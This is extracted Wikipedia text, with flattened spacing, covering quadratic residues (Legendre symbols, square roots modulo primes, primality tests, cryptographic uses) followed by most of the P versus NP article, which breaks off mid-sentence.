Setting(npp)=0{\displaystyle ({\tfrac {np}{p}})=0}allows itsdomainto be extended to the multiplicativesemigroupof all the integers.[14] One advantage of this notation over Gauss's is that the Legendre symbol is a function that can be used in formulas.[15]It can also easily be generalized tocubic, quartic and higher power residues.[16] There is a generalization of the Legendre symbol for composite values ofp, theJacobi symbol, but its properties are not as simple: ifmis composite and the Jacobi symbol(am)=−1,{\displaystyle ({\tfrac {a}{m}})=-1,}thenaNm, and ifaRmthen(am)=1,{\displaystyle ({\tfrac {a}{m}})=1,}but if(am)=1{\displaystyle ({\tfrac {a}{m}})=1}we do not know whetheraRmoraNm. For example:(215)=1{\displaystyle ({\tfrac {2}{15}})=1}and(415)=1{\displaystyle ({\tfrac {4}{15}})=1}, but2 N 15and4 R 15. Ifmis prime, the Jacobi and Legendre symbols agree. Although quadratic residues appear to occur in a rather random pattern modulon, and this has been exploited in suchapplicationsasacousticsandcryptography, their distribution also exhibits some striking regularities. UsingDirichlet's theoremon primes inarithmetic progressions, thelaw of quadratic reciprocity, and theChinese remainder theorem(CRT) it is easy to see that for anyM> 0 there are primespsuch that the numbers 1, 2, ...,Mare all residues modulop. For example, ifp≡ 1 (mod 8), (mod 12), (mod 5) and (mod 28), then by the law of quadratic reciprocity 2, 3, 5, and 7 will all be residues modulop, and thus all numbers 1–10 will be. The CRT says that this is the same asp≡ 1 (mod 840), and Dirichlet's theorem says there are an infinite number of primes of this form. 2521 is the smallest, and indeed 12≡ 1, 10462≡ 2, 1232≡ 3, 22≡ 4, 6432≡ 5, 872≡ 6, 6682≡ 7, 4292≡ 8, 32≡ 9, and 5292≡ 10 (mod 2521). The first of these regularities stems fromPeter Gustav Lejeune Dirichlet's work (in the 1830s) on theanalytic formulafor theclass numberof binaryquadratic forms.[17]Letqbe a prime number,sa complex variable, and define aDirichlet L-functionas Dirichlet showed that ifq≡ 3 (mod 4), then Therefore, in this case (primeq≡ 3 (mod 4)), the sum of the quadratic residues minus the sum of the nonresidues in the range 1, 2, ...,q− 1 is a negative number. For example, modulo 11, In fact the difference will always be an odd multiple ofqifq> 3.[18]In contrast, for primeq≡ 1 (mod 4), the sum of the quadratic residues minus the sum of the nonresidues in the range 1, 2, ...,q− 1 is zero, implying that both sums equalq(q−1)4{\displaystyle {\frac {q(q-1)}{4}}}.[citation needed] Dirichlet also proved that for primeq≡ 3 (mod 4), This implies that there are more quadratic residues than nonresidues among the numbers 1, 2, ..., (q− 1)/2. For example, modulo 11 there are four residues less than 6 (namely 1, 3, 4, and 5), but only one nonresidue (2). An intriguing fact about these two theorems is that all known proofs rely on analysis; no-one has ever published a simple or direct proof of either statement.[19] Ifpandqare odd primes, then: ((pis a quadratic residue modq) if and only if (qis a quadratic residue modp)) if and only if (at least one ofpandqis congruent to 1 mod 4). That is: where(pq){\displaystyle \left({\frac {p}{q}}\right)}is theLegendre symbol. Thus, for numbersaand odd primespthat don't dividea: Modulo a primep, the number of pairsn,n+ 1 wherenRpandn+ 1 Rp, ornNpandn+ 1 Rp, etc., are almost equal. More precisely,[20][21]letpbe an odd prime. 
Fori,j= 0, 1 define the sets and let That is, Then ifp≡ 1 (mod 4) and ifp≡ 3 (mod 4) For example: (residues inbold) Modulo 17 Modulo 19 Gauss (1828)[22]introduced this sort of counting when he proved that ifp≡ 1 (mod 4) thenx4≡ 2 (modp) can be solved if and only ifp=a2+ 64b2. The values of(ap){\displaystyle ({\tfrac {a}{p}})}for consecutive values ofamimic a random variable like acoin flip.[23]Specifically,PólyaandVinogradovproved[24](independently) in 1918 that for any nonprincipalDirichlet characterχ(n) moduloqand any integersMandN, inbig O notation. Setting this shows that the number of quadratic residues moduloqin any interval of lengthNis It is easy[25]to prove that In fact,[26] MontgomeryandVaughanimproved this in 1977, showing that, if thegeneralized Riemann hypothesisis true then This result cannot be substantially improved, forSchurhad proved in 1918 that andPaleyhad proved in 1932 that for infinitely manyd> 0. The least quadratic residue modpis clearly 1. The question of the magnitude of the least quadratic non-residuen(p) is more subtle, but it is always prime, with 7 appearing for the first time at 71. The Pólya–Vinogradov inequality above gives O(√plogp). The best unconditional estimate isn(p) ≪pθfor any θ>1/4√e, obtained by estimates of Burgess oncharacter sums.[27] Assuming theGeneralised Riemann hypothesis, Ankeny obtainedn(p) ≪ (logp)2.[28] Linnikshowed that the number ofpless thanXsuch thatn(p) > Xεis bounded by a constant depending on ε.[27] The least quadratic non-residues modpfor odd primespare: Letpbe an odd prime. Thequadratic excessE(p) is the number of quadratic residues on the range (0,p/2) minus the number in the range (p/2,p) (sequenceA178153in theOEIS). Forpcongruent to 1 mod 4, the excess is zero, since −1 is a quadratic residue and the residues are symmetric underr↔p−r. Forpcongruent to 3 mod 4, the excessEis always positive.[29] That is, given a numberaand a modulusn, how hard is it An important difference between prime and composite moduli shows up here. Modulo a primep, a quadratic residueahas 1 + (a|p) roots (i.e. zero ifaNp, one ifa≡ 0 (modp), or two ifaRpand gcd(a,p) = 1.) In general if a composite modulusnis written as a product of powers of distinct primes, and there aren1roots modulo the first one,n2mod the second, ..., there will ben1n2... roots modulon. The theoretical way solutions modulo the prime powers are combined to make solutions modulonis called theChinese remainder theorem; it can be implemented with an efficient algorithm.[30] For example: First off, if the modulusnis prime theLegendre symbol(an){\displaystyle \left({\frac {a}{n}}\right)}can bequickly computedusing a variation ofEuclid's algorithm[31]or theEuler's criterion. If it is −1 there is no solution. Secondly, assuming that(an)=1{\displaystyle \left({\frac {a}{n}}\right)=1}, ifn≡ 3 (mod 4),Lagrangefound that the solutions are given by andLegendrefound a similar solution[32]ifn≡ 5 (mod 8): For primen≡ 1 (mod 8), however, there is no known formula.Tonelli[33](in 1891) andCipolla[34]found efficient algorithms that work for all prime moduli. Both algorithms require finding a quadratic nonresidue modulon, and there is no efficient deterministic algorithm known for doing that. But since half the numbers between 1 andnare nonresidues, picking numbersxat random and calculating the Legendre symbol(xn){\displaystyle \left({\frac {x}{n}}\right)}until a nonresidue is found will quickly produce one. A slight variant of this algorithm is theTonelli–Shanks algorithm. 
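For the case n ≡ 3 (mod 4), Lagrange's formula mentioned above yields a square root with a single modular exponentiation. The sketch below assumes the input really is a quadratic residue (and checks afterwards); primes congruent to 1 modulo 4 require Tonelli–Shanks or Cipolla's algorithm instead.

```python
def sqrt_mod_p(a, p):
    """Square root of a modulo a prime p ≡ 3 (mod 4), via x = a^((p+1)/4) mod p."""
    assert p % 4 == 3
    x = pow(a, (p + 1) // 4, p)
    if (x * x) % p != a % p:
        raise ValueError("a is not a quadratic residue modulo p")
    return x

print(sqrt_mod_p(5, 11))   # 4, since 4^2 = 16 ≡ 5 (mod 11)
print(sqrt_mod_p(2, 23))   # 18, since 18^2 = 324 ≡ 2 (mod 23)
```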
If the modulusnis aprime powern=pe, a solution may be found modulopand "lifted" to a solution modulonusingHensel's lemmaor an algorithm of Gauss.[8] If the modulusnhas been factored into prime powers the solution was discussed above. Ifnis not congruent to 2 modulo 4 and theKronecker symbol(an)=−1{\displaystyle \left({\tfrac {a}{n}}\right)=-1}then there is no solution; ifnis congruent to 2 modulo 4 and(an/2)=−1{\displaystyle \left({\tfrac {a}{n/2}}\right)=-1}, then there is also no solution. Ifnis not congruent to 2 modulo 4 and(an)=1{\displaystyle \left({\tfrac {a}{n}}\right)=1}, ornis congruent to 2 modulo 4 and(an/2)=1{\displaystyle \left({\tfrac {a}{n/2}}\right)=1}, there may or may not be one. If the complete factorization ofnis not known, and(an)=1{\displaystyle \left({\tfrac {a}{n}}\right)=1}andnis not congruent to 2 modulo 4, ornis congruent to 2 modulo 4 and(an/2)=1{\displaystyle \left({\tfrac {a}{n/2}}\right)=1}, the problem is known to be equivalent tointeger factorizationofn(i.e. an efficient solution to either problem could be used to solve the other efficiently). The above discussion indicates how knowing the factors ofnallows us to find the roots efficiently. Say there were an efficient algorithm for finding square roots modulo a composite number. The articlecongruence of squaresdiscusses how finding two numbers x and y wherex2≡y2(modn)andx≠ ±ysuffices to factorizenefficiently. Generate a random number, square it modulon, and have the efficient square root algorithm find a root. Repeat until it returns a number not equal to the one we originally squared (or its negative modulon), then follow the algorithm described in congruence of squares. The efficiency of the factoring algorithm depends on the exact characteristics of the root-finder (e.g. does it return all roots? just the smallest one? a random one?), but it will be efficient.[35] Determining whetherais a quadratic residue or nonresidue modulon(denotedaRnoraNn) can be done efficiently for primenby computing the Legendre symbol. However, for compositen, this forms thequadratic residuosity problem, which is not known to be ashardas factorization, but is assumed to be quite hard. On the other hand, if we want to know if there is a solution forxless than some given limitc, this problem isNP-complete;[36]however, this is afixed-parameter tractableproblem, wherecis the parameter. In general, to determine ifais a quadratic residue modulo compositen, one can use the following theorem:[37] Letn> 1, andgcd(a,n) = 1. Thenx2≡a(modn)is solvable if and only if: Note: This theorem essentially requires that the factorization ofnis known. Also notice that ifgcd(a,n) =m, then the congruence can be reduced toa/m≡x2/m(modn/m), but then this takes the problem away from quadratic residues (unlessmis a square). The list of the number of quadratic residues modulon, forn= 1, 2, 3 ..., looks like: A formula to count the number of squares modulonis given by Stangl.[38] Sound diffusershave been based on number-theoretic concepts such asprimitive rootsand quadratic residues.[39] Paley graphsare dense undirected graphs, one for each primep≡ 1 (mod 4), that form an infinite family ofconference graphs, which yield an infinite family ofsymmetricconference matrices. Paley digraphs are directed analogs of Paley graphs, one for eachp≡ 3 (mod 4), that yieldantisymmetricconference matrices. The construction of these graphs uses quadratic residues. 
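The reduction from factoring to square-root finding sketched above rests on the congruence-of-squares step: once two square roots x and y of the same value modulo n are known with x ≢ ±y (mod n), a gcd exposes a factor. The tiny example below uses n = 91 with roots found by inspection; in the reduction itself they would come from the hypothetical root-finding algorithm.

```python
from math import gcd

# 10^2 = 100 ≡ 9 = 3^2 (mod 91), and 10 is neither 3 nor -3 modulo 91,
# so 10 and 3 are two "essentially different" square roots of 9 mod 91.
n, x, y = 91, 10, 3
assert (x * x - y * y) % n == 0 and x % n not in (y % n, (-y) % n)

factor = gcd(x - y, n)
print(factor, n // factor)   # 7 13 -- a nontrivial factorization of 91
```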
The fact that finding a square root of a number modulo a large compositenis equivalent to factoring (which is widely believed to be ahard problem) has been used for constructingcryptographic schemessuch as theRabin cryptosystemand theoblivious transfer. Thequadratic residuosity problemis the basis for theGoldwasser-Micali cryptosystem. Thediscrete logarithmis a similar problem that is also used in cryptography. Euler's criterionis a formula for the Legendre symbol (a|p) wherepis prime. Ifpis composite the formula may or may not compute (a|p) correctly. TheSolovay–Strassen primality testfor whether a given numbernis prime or composite picks a randomaand computes (a|n) using a modification of Euclid's algorithm,[40]and also using Euler's criterion.[41]If the results disagree,nis composite; if they agree,nmay be composite or prime. For a compositenat least 1/2 the values ofain the range 2, 3, ...,n− 1 will return "nis composite"; for primennone will. If, after using many different values ofa,nhas not been proved composite it is called a "probable prime". TheMiller–Rabin primality testis based on the same principles. There is a deterministic version of it, but the proof that it works depends on thegeneralized Riemann hypothesis; the output from this test is "nis definitely composite" or "eithernis prime or the GRH is false". If the second output ever occurs for a compositen, then the GRH would be false, which would have implications through many branches of mathematics. In § VI of theDisquisitiones Arithmeticae[42]Gauss discusses two factoring algorithms that use quadratic residues and thelaw of quadratic reciprocity. Several modern factorization algorithms (includingDixon's algorithm, thecontinued fraction method, thequadratic sieve, and thenumber field sieve) generate small quadratic residues (modulo the number being factorized) in an attempt to find acongruence of squareswhich will yield a factorization. The number field sieve is the fastest general-purpose factorization algorithm known. The following table (sequenceA096008in theOEIS) lists the quadratic residues mod 1 to 75 (ared numbermeans it is not coprime ton). (For the quadratic residues coprime ton, seeOEIS:A096103, and for nonzero quadratic residues, seeOEIS:A046071.) TheDisquisitiones Arithmeticaehas been translated from Gauss'sCiceronian LatinintoEnglishandGerman. The German edition includes all of his papers on number theory: all the proofs of quadratic reciprocity, the determination of the sign of theGauss sum, the investigations intobiquadratic reciprocity, and unpublished notes.
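The Solovay–Strassen test described above compares the Jacobi symbol with Euler's criterion for random bases. A minimal sketch, with a textbook Jacobi-symbol routine written out inline, might look like the following; the round count and the example numbers are arbitrary choices for illustration.

```python
import random

def jacobi(a, n):
    # Jacobi symbol (a/n) for a positive odd modulus n
    a %= n
    result = 1
    while a:
        while a % 2 == 0:
            a //= 2
            if n % 8 in (3, 5):
                result = -result
        a, n = n, a
        if a % 4 == 3 and n % 4 == 3:
            result = -result
        a %= n
    return result if n == 1 else 0

def solovay_strassen(n, rounds=20):
    # "probably prime" if (a/n) ≡ a^((n-1)/2) (mod n) for every random base tried
    if n < 2 or n % 2 == 0:
        return n == 2
    for _ in range(rounds):
        a = random.randrange(2, n)
        j = jacobi(a, n) % n
        if j == 0 or pow(a, (n - 1) // 2, n) != j:
            return False           # definitely composite
    return True                    # probably prime

# 561 is a Carmichael number and is (with overwhelming probability) reported
# composite; 569 is prime and always passes.
print(solovay_strassen(561), solovay_strassen(569))
```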
https://en.wikipedia.org/wiki/Quadratic_residue
TheP versus NP problemis a majorunsolved problemintheoretical computer science. Informally, it asks whether every problem whose solution can be quickly verified can also be quickly solved. Here, "quickly" means an algorithm exists that solves the task and runs inpolynomial time(as opposed to, say,exponential time), meaning the task completion time isbounded aboveby apolynomial functionon the size of the input to the algorithm. The general class of questions that somealgorithmcan answer in polynomial time is "P" or "class P". For some questions, there is no known way to find an answer quickly, but if provided with an answer, it can be verified quickly. The class of questions where an answer can beverifiedin polynomial time is"NP", standing for "nondeterministic polynomial time".[Note 1] An answer to the P versus NP question would determine whether problems that can be verified in polynomial time can also be solved in polynomial time. If P ≠ NP, which is widely believed, it would mean that there are problems in NP that are harder to compute than to verify: they could not be solved in polynomial time, but the answer could be verified in polynomial time. The problem has been called the most important open problem incomputer science.[1]Aside from being an important problem incomputational theory, a proof either way would have profound implications for mathematics,cryptography, algorithm research,artificial intelligence,game theory, multimedia processing,philosophy,economicsand many other fields.[2] It is one of the sevenMillennium Prize Problemsselected by theClay Mathematics Institute, each of which carries a US$1,000,000 prize for the first correct solution. Consider the following yes/no problem: given an incompleteSudokugrid of sizen2×n2{\displaystyle n^{2}\times n^{2}}, is there at least one legal solution where every row, column, andn×n{\displaystyle n\times n}square contains the integers 1 throughn2{\displaystyle n^{2}}? It is straightforward to verify "yes" instances of this generalized Sudoku problem given a candidate solution. However, it is not known whether there is a polynomial-time algorithm that can correctly answer "yes" or "no" to all instances of this problem. Therefore, generalized Sudoku is in NP (quickly verifiable), but may or may not be in P (quickly solvable). (It is necessary to consider a generalized version of Sudoku, as any fixed size Sudoku has only a finite number of possible grids. In this case the problem is in P, as the answer can be found by table lookup.) The precise statement of the P versus NP problem was introduced in 1971 byStephen Cookin his seminal paper "The complexity of theorem proving procedures"[3](and independently byLeonid Levinin 1973[4]). Although the P versus NP problem was formally defined in 1971, there were previous inklings of the problems involved, the difficulty of proof, and the potential consequences. In 1955, mathematicianJohn Nashwrote a letter to theNSA, speculating that cracking a sufficiently complex code would require time exponential in the length of the key.[5]If proved (and Nash was suitably skeptical), this would imply what is now called P ≠ NP, since a proposed key can be verified in polynomial time. Another mention of the underlying problem occurred in a 1956 letter written byKurt GödeltoJohn von Neumann. 
Gödel asked whether theorem-proving (now known to beco-NP-complete) could be solved inquadraticorlinear time,[6]and pointed out one of the most important consequences—that if so, then the discovery of mathematical proofs could be automated. The relation between thecomplexity classesP and NP is studied incomputational complexity theory, the part of thetheory of computationdealing with the resources required during computation to solve a given problem. The most common resources are time (how many steps it takes to solve a problem) and space (how much memory it takes to solve a problem). In such analysis, a model of the computer for which time must be analyzed is required. Typically such models assume that the computer isdeterministic(given the computer's present state and any inputs, there is only one possible action that the computer might take) andsequential(it performs actions one after the other). In this theory, the class P consists of alldecision problems(definedbelow) solvable on a deterministic sequential machine in a durationpolynomialin the size of the input; the classNPconsists of all decision problems whose positive solutions are verifiable inpolynomial timegiven the right information, or equivalently, whose solution can be found in polynomial time on anon-deterministicmachine.[7]Clearly, P ⊆ NP. Arguably, the biggest open question intheoretical computer scienceconcerns the relationship between those two classes: Since 2002,William Gasarchhas conducted three polls of researchers concerning this and related questions.[8][9][10]Confidence that P ≠ NP has been increasing – in 2019, 88% believed P ≠ NP, as opposed to 83% in 2012 and 61% in 2002. When restricted to experts, the 2019 answers became 99% believed P ≠ NP.[10]These polls do not imply whether P = NP, Gasarch himself stated: "This does not bring us any closer to solving P=?NP or to knowing when it will be solved, but it attempts to be an objective report on the subjective opinion of this era." To attack the P = NP question, the concept of NP-completeness is very useful. NP-complete problems are problems that any other NP problem is reducible to in polynomial time and whose solution is still verifiable in polynomial time. That is, any NP problem can be transformed into any NP-complete problem. Informally, an NP-complete problem is an NP problem that is at least as "tough" as any other problem in NP. NP-hardproblems are those at least as hard as NP problems; i.e., all NP problems can be reduced (in polynomial time) to them. NP-hard problems need not be in NP; i.e., they need not have solutions verifiable in polynomial time. For instance, theBoolean satisfiability problemis NP-complete by theCook–Levin theorem, soanyinstance ofanyproblem in NP can be transformed mechanically into a Boolean satisfiability problem in polynomial time. The Boolean satisfiability problem is one of many NP-complete problems. If any NP-complete problem is in P, then it would follow that P = NP. However, many important problems are NP-complete, and no fast algorithm for any of them is known. 
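To illustrate what "verifiable in polynomial time" means for the generalized Sudoku example given earlier, the sketch below checks a candidate solution against the clues and the row/column/box constraints. The work is clearly polynomial in the grid size, even though no polynomial-time solver is known; the 4 × 4 instance shown is an arbitrary example.

```python
def verify_sudoku(clues, candidate, n):
    """Polynomial-time check that `candidate` completes `clues` for an
    n^2 x n^2 generalized Sudoku (0 in `clues` marks an empty cell)."""
    size = n * n
    symbols = set(range(1, size + 1))
    # the candidate must agree with every given clue
    for r in range(size):
        for c in range(size):
            if clues[r][c] and clues[r][c] != candidate[r][c]:
                return False
    # every row and every column must contain 1..n^2 exactly once
    for i in range(size):
        if set(candidate[i]) != symbols:
            return False
        if {candidate[r][i] for r in range(size)} != symbols:
            return False
    # every n x n box must contain 1..n^2 exactly once
    for br in range(0, size, n):
        for bc in range(0, size, n):
            box = {candidate[r][c]
                   for r in range(br, br + n) for c in range(bc, bc + n)}
            if box != symbols:
                return False
    return True

clues = [[1, 0, 0, 0],
         [0, 0, 1, 0],
         [0, 1, 0, 0],
         [0, 0, 0, 1]]
solution = [[1, 2, 3, 4],
            [3, 4, 1, 2],
            [2, 1, 4, 3],
            [4, 3, 2, 1]]
print(verify_sudoku(clues, solution, 2))  # True
```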
From the definition alone it is unintuitive that NP-complete problems exist; however, a trivial NP-complete problem can be formulated as follows: given aTuring machineMguaranteed to halt in polynomial time, does a polynomial-size input thatMwill accept exist?[11]It is in NP because (given an input) it is simple to check whetherMaccepts the input by simulatingM; it is NP-complete because the verifier for any particular instance of a problem in NP can be encoded as a polynomial-time machineMthat takes the solution to be verified as input. Then the question of whether the instance is a yes or no instance is determined by whether a valid input exists. The first natural problem proven to be NP-complete was the Boolean satisfiability problem, also known as SAT. As noted above, this is the Cook–Levin theorem; its proof that satisfiability is NP-complete contains technical details about Turing machines as they relate to the definition of NP. However, after this problem was proved to be NP-complete,proof by reductionprovided a simpler way to show that many other problems are also NP-complete, including the game Sudoku discussed earlier. In this case, the proof shows that a solution of Sudoku in polynomial time could also be used to completeLatin squaresin polynomial time.[12]This in turn gives a solution to the problem of partitioningtri-partite graphsinto triangles,[13]which could then be used to find solutions for the special case of SAT known as 3-SAT,[14]which then provides a solution for general Boolean satisfiability. So a polynomial-time solution to Sudoku leads, by a series of mechanical transformations, to a polynomial time solution of satisfiability, which in turn can be used to solve any other NP-problem in polynomial time. Using transformations like this, a vast class of seemingly unrelated problems are all reducible to one another, and are in a sense "the same problem". Although it is unknown whether P = NP, problems outside of P are known. Just as the class P is defined in terms of polynomial running time, the classEXPTIMEis the set of all decision problems that haveexponentialrunning time. In other words, any problem in EXPTIME is solvable by adeterministic Turing machineinO(2p(n)) time, wherep(n) is a polynomial function ofn. A decision problem isEXPTIME-completeif it is in EXPTIME, and every problem in EXPTIME has apolynomial-time many-one reductionto it. A number of problems are known to be EXPTIME-complete. Because it can be shown that P ≠ EXPTIME, these problems are outside P, and so require more than polynomial time. In fact, by thetime hierarchy theorem, they cannot be solved in significantly less than exponential time. Examples include finding a perfect strategy forchesspositions on anN×Nboard[15]and similar problems for other board games.[16] The problem of deciding the truth of a statement inPresburger arithmeticrequires even more time.FischerandRabinproved in 1974[17]that every algorithm that decides the truth of Presburger statements of lengthnhas a runtime of at least22cn{\displaystyle 2^{2^{cn}}}for some constantc. Hence, the problem is known to need more than exponential run time. Even more difficult are theundecidable problems, such as thehalting problem. 
They cannot be completely solved by any algorithm, in the sense that for any particular algorithm there is at least one input for which that algorithm will not produce the right answer; it will either produce the wrong answer, finish without giving a conclusive answer, or otherwise run forever without producing any answer at all. It is also possible to consider questions other than decision problems. One such class, consisting of counting problems, is called#P: whereas an NP problem asks "Are there any solutions?", the corresponding #P problem asks "How many solutions are there?". Clearly, a #P problem must be at least as hard as the corresponding NP problem, since a count of solutions immediately tells if at least one solution exists, if the count is greater than zero. Surprisingly, some #P problems that are believed to be difficult correspond to easy (for example linear-time) P problems.[18]For these problems, it is very easy to tell whether solutions exist, but thought to be very hard to tell how many. Many of these problems are#P-complete, and hence among the hardest problems in #P, since a polynomial time solution to any of them would allow a polynomial time solution to all other #P problems. In 1975,Richard E. Ladnershowed that if P ≠ NP, then there exist problems in NP that are neither in P nor NP-complete.[19]Such problems are called NP-intermediate problems. Thegraph isomorphism problem, thediscrete logarithm problem, and theinteger factorization problemare examples of problems believed to be NP-intermediate. They are some of the very few NP problems not known to be in P or to be NP-complete. The graph isomorphism problem is the computational problem of determining whether two finitegraphsareisomorphic. An important unsolved problem in complexity theory is whether the graph isomorphism problem is in P, NP-complete, or NP-intermediate. The answer is not known, but it is believed that the problem is at least not NP-complete.[20]If graph isomorphism is NP-complete, thepolynomial time hierarchycollapses to its second level.[21]Since it is widely believed that the polynomial hierarchy does not collapse to any finite level, it is believed that graph isomorphism is not NP-complete. The best algorithm for this problem, due toLászló Babai, runs inquasi-polynomial time.[22] The integer factorization problem is the computational problem of determining theprime factorizationof a given integer. Phrased as a decision problem, it is the problem of deciding whether the input has a factor less thank. No efficient integer factorization algorithm is known, and this fact forms the basis of several modern cryptographic systems, such as theRSAalgorithm. The integer factorization problem is in NP and inco-NP(and even inUPand co-UP[23]). If the problem is NP-complete, the polynomial time hierarchy will collapse to its first level (i.e., NP = co-NP). The mostefficientknown algorithm for integer factorization is thegeneral number field sieve, which takes expected time to factor ann-bit integer. The best knownquantum algorithmfor this problem,Shor's algorithm, runs in polynomial time, although this does not indicate where the problem lies with respect to non-quantum complexity classes. All of the above discussion has assumed that P means "easy" and "not in P" means "difficult", an assumption known asCobham's thesis. It is a common assumption in complexity theory; but there are caveats. First, it can be false in practice. 
A theoretical polynomial algorithm may have extremely large constant factors or exponents, rendering it impractical. For example, the problem ofdecidingwhether a graphGcontainsHas aminor, whereHis fixed, can be solved in a running time ofO(n2),[25]wherenis the number of vertices inG. However, thebig O notationhides a constant that depends superexponentially onH. The constant is greater than2↑↑(2↑↑(2↑↑(h/2))){\displaystyle 2\uparrow \uparrow (2\uparrow \uparrow (2\uparrow \uparrow (h/2)))}(usingKnuth's up-arrow notation), and wherehis the number of vertices inH.[26] On the other hand, even if a problem is shown to be NP-complete, and even if P ≠ NP, there may still be effective approaches to the problem in practice. There are algorithms for many NP-complete problems, such as theknapsack problem, thetraveling salesman problem, and theBoolean satisfiability problem, that can solve to optimality many real-world instances in reasonable time. The empiricalaverage-case complexity(time vs. problem size) of such algorithms can be surprisingly low. An example is thesimplex algorithminlinear programming, which works surprisingly well in practice; despite having exponential worst-casetime complexity, it runs on par with the best known polynomial-time algorithms.[27] Finally, there are types of computations which do not conform to the Turing machine model on which P and NP are defined, such asquantum computationandrandomized algorithms. Cook provides a restatement of the problem inThe P Versus NP Problemas "Does P = NP?"[28]According to polls,[8][29]most computer scientists believe that P ≠ NP. A key reason for this belief is that after decades of studying these problems no one has been able to find a polynomial-time algorithm for any of more than 3,000 important known NP-complete problems (seeList of NP-complete problems). These algorithms were sought long before the concept of NP-completeness was even defined (Karp's 21 NP-complete problems, among the first found, were all well-known existing problems at the time they were shown to be NP-complete). Furthermore, the result P = NP would imply many other startling results that are currently believed to be false, such as NP =co-NPand P =PH. It is also intuitively argued that the existence of problems that are hard to solve but whose solutions are easy to verify matches real-world experience.[30] If P = NP, then the world would be a profoundly different place than we usually assume it to be. There would be no special value in "creative leaps", no fundamental gap between solving a problem and recognizing the solution once it's found. On the other hand, some researchers believe that it is overconfident to believe P ≠ NP and that researchers should also explore proofs of P = NP. For example, in 2002 these statements were made:[8] The main argument in favor of P ≠ NP is the total lack of fundamental progress in the area of exhaustive search. This is, in my opinion, a very weak argument. The space of algorithms is very large and we are only at the beginning of its exploration. [...] The resolution ofFermat's Last Theoremalso shows that very simple questions may be settled only by very deep theories. Being attached to a speculation is not a good guide to research planning. One should always try both directions of every problem. Prejudice has caused famous mathematicians to fail to solve famous problems whose solution was opposite to their expectations, even though they had developed all the methods required. 
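As a concrete footnote to the earlier point that NP-completeness does not rule out methods that work well on real instances, the following sketch solves 0/1 knapsack instances exactly by dynamic programming. Its O(n·W) running time is pseudo-polynomial (it depends on the numeric capacity W, not only on the input length), which is why it does not contradict the problem's NP-completeness; the instance data are invented for illustration.

def knapsack(values, weights, capacity):
    # dp[w] = best total value achievable with total weight at most w.
    dp = [0] * (capacity + 1)
    for v, wt in zip(values, weights):
        for w in range(capacity, wt - 1, -1):   # iterate downwards so each item is used at most once
            dp[w] = max(dp[w], dp[w - wt] + v)
    return dp[capacity]

print(knapsack(values=[60, 100, 120], weights=[10, 20, 30], capacity=50))   # 220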
When one substitutes "linear time on a multitape Turing machine" for "polynomial time" in the definitions of P and NP, one obtains the classesDLINandNLIN. It is known[31]that DLIN ≠ NLIN. One of the reasons the problem attracts so much attention is the consequences of the possible answers. Either direction of resolution would advance theory enormously, and perhaps have huge practical consequences as well. A proof that P = NP could have stunning practical consequences if the proof leads to efficient methods for solving some of the important problems in NP. The potential consequences, both positive and negative, arise since various NP-complete problems are fundamental in many fields. It is also very possible that a proof wouldnotlead to practical algorithms for NP-complete problems. The formulation of the problem does not require that the bounding polynomial be small or even specifically known. Anon-constructive proofmight show a solution exists without specifying either an algorithm to obtain it or a specific bound. Even if the proof is constructive, showing an explicit bounding polynomial and algorithmic details, if the polynomial is not very low-order the algorithm might not be sufficiently efficient in practice. In this case the initial proof would be mainly of interest to theoreticians, but the knowledge that polynomial time solutions are possible would surely spur research into better (and possibly practical) methods to achieve them. A solution showing P = NP could upend the field ofcryptography, which relies on certain problems being difficult. A constructive and efficient solution[Note 2]to an NP-complete problem such as3-SATwould break most existing cryptosystems including: These would need modification or replacement withinformation-theoretically securesolutions that do not assume P ≠ NP. There are also enormous benefits that would follow from rendering tractable many currently mathematically intractable problems. For instance, many problems inoperations researchare NP-complete, such as types ofinteger programmingand thetravelling salesman problem. Efficient solutions to these problems would have enormous implications for logistics. Many other important problems, such as some problems inprotein structure prediction, are also NP-complete;[35]making these problems efficiently solvable could considerably advance life sciences and biotechnology. These changes could be insignificant compared to the revolution that efficiently solving NP-complete problems would cause in mathematics itself. Gödel, in his early thoughts on computational complexity, noted that a mechanical method that could solve any problem would revolutionize mathematics:[36][37] If there really were a machine with φ(n) ∼k⋅n(or even ∼k⋅n2), this would have consequences of the greatest importance. Namely, it would obviously mean that in spite of the undecidability of theEntscheidungsproblem, the mental work of a mathematician concerning Yes-or-No questions could be completely replaced by a machine. After all, one would simply have to choose the natural numbernso large that when the machine does not deliver a result, it makes no sense to think more about the problem. Similarly,Stephen Cook(assuming not only a proof, but a practically efficient algorithm) says:[28] ... it would transform mathematics by allowing a computer to find a formal proof of any theorem which has a proof of a reasonable length, since formal proofs can easily be recognized in polynomial time. 
Example problems may well include all of theCMI prize problems. Research mathematicians spend their careers trying to prove theorems, and some proofs have taken decades or even centuries to find after problems have been stated—for instance,Fermat's Last Theoremtook over three centuries to prove. A method guaranteed to find a proof if a "reasonable" size proof exists, would essentially end this struggle. Donald Knuthhas stated that he has come to believe that P = NP, but is reserved about the impact of a possible proof:[38] [...] if you imagine a numberMthat's finite but incredibly large—like say the number 10↑↑↑↑3 discussed in my paper on "coping with finiteness"—then there's a humongous number of possible algorithms that donMbitwise or addition or shift operations onngiven bits, and it's really hard to believe that all of those algorithms fail. My main point, however, is that I don't believe that the equality P = NP will turn out to be helpful even if it is proved, because such a proof will almost surely be nonconstructive. A proof of P ≠ NP would lack the practical computational benefits of a proof that P = NP, but would represent a great advance in computational complexity theory and guide future research. It would demonstrate that many common problems cannot be solved efficiently, so that the attention of researchers can be focused on partial solutions or solutions to other problems. Due to widespread belief in P ≠ NP, much of this focusing of research has already taken place.[39] P ≠ NP still leaves open theaverage-case complexityof hard problems in NP. For example, it is possible that SAT requires exponential time in the worst case, but that almost all randomly selected instances of it are efficiently solvable.Russell Impagliazzohas described five hypothetical "worlds" that could result from different possible resolutions to the average-case complexity question.[40]These range from "Algorithmica", where P = NP and problems like SAT can be solved efficiently in all instances, to "Cryptomania", where P ≠ NP and generating hard instances of problems outside P is easy, with three intermediate possibilities reflecting different possible distributions of difficulty over instances of NP-hard problems. The "world" where P ≠ NP but all problems in NP are tractable in the average case is called "Heuristica" in the paper. APrinceton Universityworkshop in 2009 studied the status of the five worlds.[41] Although the P = NP problem itself remains open despite a million-dollar prize and a huge amount of dedicated research, efforts to solve the problem have led to several new techniques. In particular, some of the most fruitful research related to the P = NP problem has been in showing that existing proof techniques are insufficient for answering the question, suggesting novel technical approaches are required. As additional evidence for the difficulty of the problem, essentially all known proof techniques incomputational complexity theoryfall into one of the following classifications, all insufficient to prove P ≠ NP: These barriers are another reason why NP-complete problems are useful: if a polynomial-time algorithm can be demonstrated for an NP-complete problem, this would solve the P = NP problem 